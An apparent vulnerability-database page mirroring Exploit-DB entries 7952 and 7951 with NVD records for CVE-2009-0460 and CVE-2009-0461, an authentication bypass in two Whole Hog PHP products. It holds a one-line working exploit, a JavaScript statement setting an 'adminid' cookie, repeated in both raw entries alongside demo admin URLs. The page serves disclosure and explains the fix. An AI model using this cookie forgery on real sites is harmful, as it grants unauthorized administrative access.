ID EDB-ID:7952
Type exploitdb
Reporter Stack
Modified 2009-02-03T00:00:00
Description
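WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability (CVE-2009-0460, CVE-2009-0461). Webapps exploit for the PHP platform. Of the two CVEs listed, the NVD records further down this page assign CVE-2009-0461 to Password Protect: Enhanced 1.x and CVE-2009-0460 to the sibling product Ware Support 1.x (EDB-ID:7951); both are classified CWE-287 (improper authentication). In both products the administrative area accepts an integer value in the client-supplied adminid cookie as proof of login, so anyone who can set a cookie for the site can bypass authentication. Because a cookie value is fully controlled by the client, a fix has to tie the admin check to server-side session state established at login rather than to the presence of an identifier in the cookie.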
###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script :Password Protect
[+] Site :http://wholehogsoftware.com
[+] Detail :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Friends
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
# milw0rm.com [2009-02-03]
{"id": "EDB-ID:7952", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln", "description": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "modified": "2009-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7952/", "reporter": "Stack", "references": [], "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "lastseen": "2016-02-01T03:24:46", "viewCount": 8, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T03:24:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0461", "CVE-2009-0460"]}, {"type": "exploitdb", "idList": ["EDB-ID:7951"]}], "modified": "2016-02-01T03:24:46", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/7952/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability\n[+] Script :Password Protect\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/password_protect_enhanced/admin\n\n# milw0rm.com [2009-02-03]\n", "osvdbidlist": ["51734"]}
{"cve": [{"lastseen": "2021-02-02T05:39:59", "description": "Whole Hog Password Protect: Enhanced 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 4, "cvss3": {}, "published": "2009-02-10T07:00:00", "title": "CVE-2009-0461", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0461"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:wholehogsoftware:password_protect:1.0"], "id": "CVE-2009-0461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wholehogsoftware:password_protect:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:39:59", "description": "Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 4, "cvss3": {}, "published": "2009-02-10T07:00:00", "title": "CVE-2009-0460", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0460"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:wholehogsoftware:ware_support:1.0"], "id": "CVE-2009-0460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0460", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wholehogsoftware:ware_support:1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T03:24:37", "description": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "type": "exploitdb", "title": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7951", "href": "https://www.exploit-db.com/exploits/7951/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability\n[+] Script :Ware Support\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/support/admin/\n\n# milw0rm.com [2009-02-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7951/"}]}